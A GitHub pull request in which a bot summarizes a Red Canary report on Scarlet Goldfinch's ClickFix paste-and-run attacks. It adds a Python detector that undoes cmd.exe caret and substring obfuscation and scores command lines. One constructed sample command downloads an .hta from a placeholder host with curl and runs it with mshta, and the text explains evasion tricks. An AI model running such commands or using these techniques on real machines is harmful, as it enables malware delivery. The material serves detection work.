
Scarlet Goldfinch’s year in ClickFix#2056

Open
carlospolop wants to merge 1 commit into master from update_Scarlet_Goldfinch_s_year_in_ClickFix_20260326_190503

@carlospolop (Collaborator)

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

  • Blog URL: https://redcanary.com/blog/threat-intelligence/scarlet-goldfinch-clickfix/
  • Blog Title: Scarlet Goldfinch’s year in ClickFix
  • Suggested Section: Windows Hardening -> (new/adapt) Windows tradecraft/defense-evasion notes, or Pentesting Web/Generic Hacking -> Social Engineering/Phishing Methodology (ClickFix/paste-and-run) + Windows LOLBAS (mshta/cmd obfuscation) + DLL Hijacking/Sideloading

🎯 Content Summary

Title / scope
Red Canary documents how the threat cluster it tracks as Scarlet Goldfinch evolved its user-execution initial access tradecraft into paste-and-run (often called ClickFix): victims are socially engineered (CAPTCHA-style “fix” prompts) into copying attacker-provided command lines and executing them via Windows execution surfaces (e.g., command prompt/Run dialog). Red Canary maps this to MITRE ATT&CK T1204.004 – User Execution: Malicious Copy and Pas...

🔧 Technical Details

Paste-and-run (ClickFix) initial access (T1204.004): Present a compromised-site lure (often CAPTCHA/“fix” themed) that instructs the user to copy/paste attacker-controlled commands into Windows execution surfaces. This yields code execution without exploiting a software vulnerability, so prevention must focus on user execution controls, script/command-line telemetry, and hardening against LOLBAS abuse.

HTA execution via LOLBAS + network-evasion split: Use cmd to run curl and download an .hta to disk, then execute it with mshta. By splitting download and execution, defenders relying on detections for mshta-initiated network activity may miss the transfer while mshta still provides initial execution.

CMD obfuscation with delayed expansion + caret escapes + substring indexing: Enable delayed environment variable expansion (cmd.exe /v:on) to build and chain command...

🤖 Agent Actions

I’m mapping the repository first and then I’ll read the most relevant Windows, phishing, LOLBAS, and DLL sideloading pages to find the single best target file without duplicating existing content.
The repo already contains ClickFix and DLL sideloading material, so I’m reading the existing phishing and Windows tradecraft pages now to see whether the Scarlet Goldfinch mechanics are already covered or whether there’s a concrete gap worth adding.
I found the main gap: the phishing page already mentions Scarlet Goldfinch at a high level, but it does not capture the Epoch 7 mechanics that matter for detection, especially cmd.exe /v:on, caret-splitting, substring-based command reconstruction, and the cmd/curl plus mshta split. I’m verifying those details against the source page before editing the existing ClickFix page.
I’ve narrowed it to a single-file update in clipboard-hijacking.md. The file already owns ClickFix tradecraft, and the missing piece is a compact Epoch 7 subsection covering the forfiles to if exist swap, cmd.exe /v:on, caret and substring obfuscation, and the curl to mshta split with the Remcos sideload chain.
The edit is in place. I’m checking the rendered section and diff now to make sure the new material is concise, non-duplicative, and the references section still sits at the end of the file.
Updated clipboard-hijacking.md with a new Scarlet Goldfinch Epoch 7 subsection. I kept it in the existing ClickFix page because the repo already covers the broader DLL sideloading mechanics elsewhere, while this blog adds new paste-and-run tradecraft details that were missing there.

The new content captures the parts not yet documented: the forfiles to if exist detection-surface swap, cmd.exe /v:on delayed expansion, caret-based CMD obfuscation, substring-index reconstruction of curl, the curl to local-HTA plus mshta split to avoid mshta network telemetry, and the follow-on %LOCALAPPDATA% numeric staging plus tar -xf plus Invoke-CimMethod Remcos sideload chain. I also added the Red Canary blog to the file’s ## References section. Verified with git diff and git status; only that single file changed.


This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.
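The PR summary lists the command-line traits that make this paste-and-run variant visible in process telemetry: `cmd.exe /v:on` delayed expansion, caret-split tokens, `!var:~start,len!` substring reconstruction of `curl`, a download to disk, and `mshta` launched against a local `.hta`. The following detector is an added example written for this page; it is not code from the PR, from HackTricks, or from the Red Canary post. It undoes caret splitting and delayed-expansion substrings the way `cmd.exe` would, then scores the recovered command line. The sample command lines, the indicator regexes, the weights and the threshold are all constructed assumptions for illustration, not observed Scarlet Goldfinch commands or vendor signatures.

```python
import re

# Constructed sample command lines, as a Sysmon/EDR sensor would log them.
# They are made up for this example; none is an observed Scarlet Goldfinch command.
SAMPLE_EVENTS = {
    "benign_loop": 'cmd.exe /c for %i in (a b) do echo %i',
    "benign_delayed": 'cmd.exe /v:on /c "set n=3 & echo !n!"',
    "clickfix_like": (
        'cmd.exe /v:on /c set "z=xxcurl" & !z:~2,4! -o %LOCALAPPDATA%\\u.hta '
        'http://example.invalid/u & m^sh^t^a %LOCALAPPDATA%\\u.hta'
    ),
}

# Heuristic indicator patterns (assumptions for this example, not vendor signatures)
_RE_DELAYED = re.compile(r'(?i)(?<!\S)/v(?::on)?(?=\s|$)')          # cmd.exe /v or /v:on
_RE_CARET_IN_TOKEN = re.compile(r'(?<=[A-Za-z0-9])\^(?=[A-Za-z0-9])')  # m^s^h^t^a
_RE_SET = re.compile(r'(?i)\bset\s+"?([A-Za-z_][A-Za-z0-9_]*)=([^"&|]*)"?')
_RE_SUBSTRING = re.compile(r'!([A-Za-z_][A-Za-z0-9_]*):~(-?\d+)(?:,(-?\d+))?!')
_RE_CURL_OUT = re.compile(r'(?i)\bcurl\b[^&|]*\s-o\s')                 # curl ... -o <file>
_RE_MSHTA_LOCAL = re.compile(r'(?i)\bmshta\b\s+(?!https?://)\S*\.hta\b')  # mshta <local .hta>

# Assumed weights: the combination, not any single trait, is what should page an analyst.
WEIGHTS = {
    "delayed_expansion": 1,
    "caret_split_tokens": 1,   # per caret inside a token, capped at 3
    "substring_expansion": 2,
    "curl_to_disk": 2,
    "mshta_local_hta": 3,
}
THRESHOLD = 5


def normalize(cmdline: str) -> str:
    """Strip cmd.exe caret escapes so split tokens read as whole words."""
    return cmdline.replace('^', '')


def resolve_substrings(cmdline: str) -> str:
    """Resolve delayed-expansion substrings (!var:~start,len!) using the
    set var=value assignments on the same command line, following cmd.exe
    semantics: negative start counts from the end, negative len trims the end."""
    assigned = {m.group(1).lower(): m.group(2) for m in _RE_SET.finditer(cmdline)}

    def expand(m: re.Match) -> str:
        value = assigned.get(m.group(1).lower())
        if value is None:
            return m.group(0)  # unknown variable: leave the token untouched
        start = int(m.group(2))
        if m.group(3) is None:
            return value[start:]
        length = int(m.group(3))
        if length < 0:
            return value[start:length]
        if start < 0 and start + length >= 0:
            return value[start:]
        return value[start:start + length]

    return _RE_SUBSTRING.sub(expand, cmdline)


def analyze(cmdline: str) -> dict:
    """Score one process command line; returns indicators, the deobfuscated
    form and whether it crosses the assumed threshold."""
    norm = normalize(cmdline)
    deob = resolve_substrings(norm)
    indicators = {
        "delayed_expansion": bool(_RE_DELAYED.search(norm)),
        "caret_split_tokens": len(_RE_CARET_IN_TOKEN.findall(cmdline)),
        "substring_expansion": bool(_RE_SUBSTRING.search(norm)),
        "curl_to_disk": bool(_RE_CURL_OUT.search(deob)),
        "mshta_local_hta": bool(_RE_MSHTA_LOCAL.search(deob)),
    }
    score = sum(w for k, w in WEIGHTS.items() if k != "caret_split_tokens" and indicators[k])
    score += WEIGHTS["caret_split_tokens"] * min(indicators["caret_split_tokens"], 3)
    return {
        "indicators": indicators,
        "deobfuscated": deob,
        "score": score,
        "flagged": score >= THRESHOLD,
    }


if __name__ == "__main__":
    for label, cmd in SAMPLE_EVENTS.items():
        result = analyze(cmd)
        print(f"{label:16} score={result['score']:2} flagged={result['flagged']}")
        print(f"{'':16} deobfuscated: {result['deobfuscated']}")
```

The deobfuscation step matters more than any single regex: a rule that looks for the literal `curl` or `mshta` in the raw command line misses both when they are caret-split or rebuilt from substrings, while a rule on `/v:on` alone fires on ordinary batch scripts. Scoring the recovered command line over the combination of delayed expansion, reconstruction and a local `.hta` handed to `mshta` lets the cmd/curl download and the mshta execution be tied together even when, as the PR notes, mshta itself never touches the network.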

@carlospolop (Collaborator, Author)

🔗 Additional Context

Original Blog Post: https://redcanary.com/blog/threat-intelligence/scarlet-goldfinch-clickfix/

Content Categories: Based on the analysis, this content was categorized under "Windows Hardening -> (new/adapt) Windows tradecraft/defense-evasion notes, or Pentesting Web/Generic Hacking -> Social Engineering/Phishing Methodology (ClickFix/paste-and-run) + Windows LOLBAS (mshta/cmd obfuscation) + DLL Hijacking/Sideloading".

Repository Maintenance:

  • MD Files Formatting: 963 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0
